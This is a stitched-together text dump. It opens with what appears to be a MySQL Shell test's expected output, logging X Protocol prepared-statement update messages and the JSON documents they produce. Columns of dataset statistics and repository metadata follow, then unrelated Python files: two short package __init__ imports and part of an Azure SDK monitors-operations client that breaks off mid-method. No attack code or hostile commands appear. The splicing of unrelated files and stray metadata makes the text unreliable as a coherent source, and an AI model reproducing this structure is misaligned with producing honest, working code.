Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after array_append(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 6
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 6
}
#@<OUT> second execution after array_append(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after array_append(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 6
}
#@<OUT> third execution after array_append(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> sort() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 6
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
#@<OUT> sort() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after sort(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 7
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 7
}
#@<OUT> second execution after sort(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after sort(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 7
}
#@<OUT> third execution after sort(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> limit() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 7
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
limit {
row_count: 2
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
#@<OUT> limit() changes statement, back to normal execution
Query OK, 2 items affected ([[*]] sec)
Rows matched: 2 Changed: 2 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 2 items affected ([[*]] sec)
Rows matched: 3 Changed: 2 Warnings: 0
#@<PROTOCOL> second execution after limit(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 8
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
limit_expr {
row_count {
type: PLACEHOLDER
position: 0
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 8
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 2
}
}
}
#@<OUT> second execution after limit(), prepares statement and executes it
Query OK, 2 items affected ([[*]] sec)
Rows matched: 2 Changed: 2 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 2 items affected ([[*]] sec)
Rows matched: 3 Changed: 2 Warnings: 0
#@<PROTOCOL> third execution after limit(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 8
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 2
}
}
}
#@<OUT> third execution after limit(), uses prepared statement
Query OK, 2 items affected ([[*]] sec)
Rows matched: 2 Changed: 2 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 2 items affected ([[*]] sec)
Rows matched: 3 Changed: 2 Warnings: 0
#@<PROTOCOL> prepares statement to test no changes when reusing bind() and limit()
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "like"
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
param {
type: PLACEHOLDER
position: 0
}
}
}
limit {
row_count: 1
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 19
}
}
}
args {
type: V_STRING
v_string {
value: "g%"
}
}
}
#@<OUT> prepares statement to test no changes when reusing bind() and limit()
Query OK, 1 item affected ([[*]] sec)
Rows matched: 1 Changed: 1 Warnings: 0
{
"_id": "001",
"age": 19,
"name": "george"
}
{
"_id": "002",
"age": 18,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
3 documents in set ([[*]] sec)
#@<PROTOCOL> Reusing statement with bind() using j%
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 9
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "like"
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
param {
type: PLACEHOLDER
position: 0
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 19
}
}
}
limit_expr {
row_count {
type: PLACEHOLDER
position: 1
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 9
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "j%"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> Reusing statement with bind() using j%
Query OK, 1 item affected ([[*]] sec)
Rows matched: 1 Changed: 1 Warnings: 0
{
"_id": "001",
"age": 19,
"name": "george"
}
{
"_id": "002",
"age": 19,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
3 documents in set ([[*]] sec)
#@<PROTOCOL> Reusing statement with new limit()
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 9
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "%"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 2
}
}
}
#@<OUT> Reusing statement with new limit()
Query OK, 2 items affected ([[*]] sec)
Rows matched: 2 Changed: 0 Warnings: 0
{
"_id": "001",
"age": 19,
"name": "george"
}
{
"_id": "002",
"age": 19,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
3 documents in set ([[*]] sec)
| 18.305727
| 86
| 0.376442
| 5,180
| 62,331
| 4.407915
| 0.025097
| 0.055796
| 0.096177
| 0.117549
| 0.994963
| 0.992774
| 0.989664
| 0.975693
| 0.965751
| 0.936101
| 0
| 0.022645
| 0.510436
| 62,331
| 3,404
| 87
| 18.311105
| 0.72561
| 0.055911
| 0
| 0.707347
| 0
| 0
| 0.060842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
24f4a8589f1ef4afc068c245028a9f87934274cb
| 81
|
py
|
Python
|
kd_splicing/kd_splicing/location/__init__.py
|
konovalovdmitry/catsnap
|
d5f1d7c37dcee1ad3fee2cdc12a3b44b56f4c63f
|
[
"MIT"
] | null | null | null |
kd_splicing/kd_splicing/location/__init__.py
|
konovalovdmitry/catsnap
|
d5f1d7c37dcee1ad3fee2cdc12a3b44b56f4c63f
|
[
"MIT"
] | null | null | null |
kd_splicing/kd_splicing/location/__init__.py
|
konovalovdmitry/catsnap
|
d5f1d7c37dcee1ad3fee2cdc12a3b44b56f4c63f
|
[
"MIT"
] | 1
|
2021-09-30T08:06:20.000Z
|
2021-09-30T08:06:20.000Z
|
from kd_splicing.location.models import *
from kd_splicing.location import utils
| 27
| 41
| 0.851852
| 12
| 81
| 5.583333
| 0.583333
| 0.179104
| 0.41791
| 0.656716
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 2
| 42
| 40.5
| 0.917808
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7071f6303070a666e640ba6e39abe632b13a815e
| 145
|
py
|
Python
|
src/handlers/special/__init__.py
|
Alex-T13/stc_13-whithout-django-old
|
2cbd3d84b8c602d103ee60abcd68cdec33f88482
|
[
"MIT"
] | null | null | null |
src/handlers/special/__init__.py
|
Alex-T13/stc_13-whithout-django-old
|
2cbd3d84b8c602d103ee60abcd68cdec33f88482
|
[
"MIT"
] | null | null | null |
src/handlers/special/__init__.py
|
Alex-T13/stc_13-whithout-django-old
|
2cbd3d84b8c602d103ee60abcd68cdec33f88482
|
[
"MIT"
] | null | null | null |
from .handlers_4xx import handle_404
from .handlers_4xx import handle_405
from .handlers_5xx import handle_500
from .static import handle_static
| 29
| 36
| 0.862069
| 23
| 145
| 5.130435
| 0.434783
| 0.40678
| 0.254237
| 0.355932
| 0.457627
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 0.110345
| 145
| 4
| 37
| 36.25
| 0.821705
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
562e3563b5a863f53eab772993ed732b774f84a0
| 21,486
|
py
|
Python
|
sdk/workloadmonitor/azure-mgmt-workloadmonitor/azure/mgmt/workloadmonitor/operations/_monitors_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/workloadmonitor/azure-mgmt-workloadmonitor/azure/mgmt/workloadmonitor/operations/_monitors_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/workloadmonitor/azure-mgmt-workloadmonitor/azure/mgmt/workloadmonitor/operations/_monitors_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class MonitorsOperations(object):
"""MonitorsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~workload_monitor_api.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
subscription_id, # type: str
resource_group_name, # type: str
resource_namespace, # type: str
resource_type, # type: str
resource_name, # type: str
filter=None, # type: Optional[str]
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.MonitorList"]
"""Get list of a monitors of a resource (with optional filter).
Get list of a monitors of a resource (with optional filter).
:param subscription_id: The subscriptionId of the resource.
:type subscription_id: str
:param resource_group_name: The resourceGroupName of the resource.
:type resource_group_name: str
:param resource_namespace: The resourceNamespace of the resource.
:type resource_namespace: str
:param resource_type: The resourceType of the resource.
:type resource_type: str
:param resource_name: The resourceType of the resource.
:type resource_name: str
:param filter: list example: $filter=monitorName eq 'logical-disks|C:|disk-free-space-mb';
history example: $filter=isHeartbeat eq false.
:type filter: str
:param expand: ex: $expand=evidence,configuration.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MonitorList or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~workload_monitor_api.models.MonitorList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MonitorList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-01-13-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceNamespace': self._serialize.url("resource_namespace", resource_namespace, 'str'),
'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('MonitorList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.DefaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceNamespace}/{resourceType}/{resourceName}/providers/Microsoft.WorkloadMonitor/monitors'} # type: ignore
def get(
self,
subscription_id, # type: str
resource_group_name, # type: str
resource_namespace, # type: str
resource_type, # type: str
resource_name, # type: str
monitor_id, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.Monitor"
"""Get the current status of a monitor of a resource.
Get the current status of a monitor of a resource.
:param subscription_id: The subscriptionId of the resource.
:type subscription_id: str
:param resource_group_name: The resourceGroupName of the resource.
:type resource_group_name: str
:param resource_namespace: The resourceNamespace of the resource.
:type resource_namespace: str
:param resource_type: The resourceType of the resource.
:type resource_type: str
:param resource_name: The resourceType of the resource.
:type resource_name: str
:param monitor_id: The monitorId of the resource (url encoded).
:type monitor_id: str
:param expand: ex: $expand=evidence,configuration.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Monitor, or the result of cls(response)
:rtype: ~workload_monitor_api.models.Monitor
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.Monitor"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-01-13-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceNamespace': self._serialize.url("resource_namespace", resource_namespace, 'str'),
'resourceType': self._serialize.url("resource_type", resource_type, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'monitorId': self._serialize.url("monitor_id", monitor_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
